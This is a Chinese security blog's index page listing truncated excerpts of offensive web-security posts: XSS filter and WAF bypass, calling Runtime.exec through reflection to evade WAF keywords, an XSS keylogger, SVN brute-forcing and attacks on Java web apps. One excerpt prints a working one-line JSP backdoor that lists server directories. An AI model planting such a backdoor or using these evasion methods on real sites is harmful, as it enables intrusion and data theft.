[Cnblog-r00tgrok]译文:WAF指纹识别和XSS过滤器绕过技巧
FROM:http://www.cnblogs.com/r00tgrok/p/Bypass_WAF_and_XSS_Filter.html 0x1 前言 之前在乌云drops上看到一篇绕过WAF跨站脚本过滤器的一些技巧,是从老外的一篇paper部分翻译过来的,可以说文章摘取了原文最核心的部分并对文字做了简要翻译,Bypass XSS过滤的测试方法。看完后觉得确实讲得比较全面和细致,然后找出了英文原...
阅读全文Documents(39 篇文章)
Java数据源"Hack"
哦,My God..ApplicationContext.xml找不到明文的数据库连接账号密码!快崩溃了,看过攻击JavaWeb应用[1]-JavaEE 基础 和攻击JavaWeb应用[7]-Server篇[1]也没能找到数据库密码。 在ApplicationContext看到了dbcp或c3p0的配置,但是那里也没写明文的密码啊?到底要怎么连接数据库? 上图配置了两种常见的数据源,可以一眼就看到...
阅读全文Java 反射执行系统命令
某些时候为了避免一些关键字或者限制,可以用反射去调用一些敏感的东东。比如某些WAF限制了:Runtime.getRuntime().exec、import java.lang.reflect.*。 package org.javaweb.url; import java.io.BufferedReader; import java.io.InputStreamReader; public clas...
阅读全文Jsp一行代码遍历当前目录所有文件
有小伙伴在求只有遍历文件功能的后门,很简单: <%=java.util.Arrays.toString(new java.io.File(request.getParameter("p")).list())%> 如果需要解决中文乱码问题: <%@ page language="java" pageEncoding="UTF-8&q...
阅读全文并发请求导致的业务处理安全风险及解决方案
0x00 背景 一段简单的购买程序,看起来没有任何问题。 剩余余额、商品库存、购买权限等判断面面俱到,从头到脚包装的严严实实。 但是为何人一多就频频漏点呐?何解? 0x01 问题分析 还是以商城购买为例,商城网站是web程序和数据库两部分,业务处理流程: 用户金额是否大于商品价格—>商品库存是否充足—>购买操作:生成订单—>扣除用户金额—>商品库存减1 流程的每一部分都是w...
阅读全文[F4CK-phithon]javascript键盘记录详解,各种浏览器适用
最近在尝试写自己的xss平台,因为对现有的平台还是不够满足。首先就是这个键盘记录功能不好加进去,要加就得改代码,感觉有点麻烦。因为我们的键盘记录是需要持续记录键盘的输入,并持续向我们的服务端发送数据,现有的xss平台每次发送来的数据都会接收一次(而不是更新之前接收过的),就会造成数据的庞大。(不知道xss.tw改进没有,我一直没有哪里的邀请码) 哦?有同学在问什么是键盘记录了,它跟xss有什么关系...
阅读全文"内网漫游"-web
经常在wooyun看到“漫游内网”之类的漏洞,那么这样的漏洞一般是怎么产生的呢? Demo1:未经校验的url重定向 import java.io.IOException; import javax.servlet.ServletException; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServl...
阅读全文Java 实现登录SVN(可3690端口爆破)
很多扫描SVN工具都是扫描的.svn文件,不能通过端口去扫描SVN。Java有SVN的扩展库,已实现了SVN客户端的所有功能。 SVN有个未授权访问问题,默认不开启。一般人都会设置必须登录才能访问资源,但不排除少部分偷懒的人。其次就是SVN弱口令了。 svnserve.conf: authz-db = authz 去年写了个简单的SVN客户端放着也没用。下面给的一个认证的demo程序,需要jar包...
阅读全文[原创] 攻击JavaWeb应用[1-8]
最新更新了后门篇,记录了下JavaWeb后门相关东东。 攻击JavaWeb应用[1-8].pdf 攻击JavaWeb应用[1-8].doc 内容: 攻击JavaWeb应用[1]-JavaEE 基础 攻击JavaWeb应用[2]-CS交互安全 攻击JavaWeb应用[3]-SQL注入[1] 攻击JavaWeb应用[4]-SQL注入[2] 攻击JavaWeb应用[5]-MVC安全 攻击JavaWeb应...
阅读全文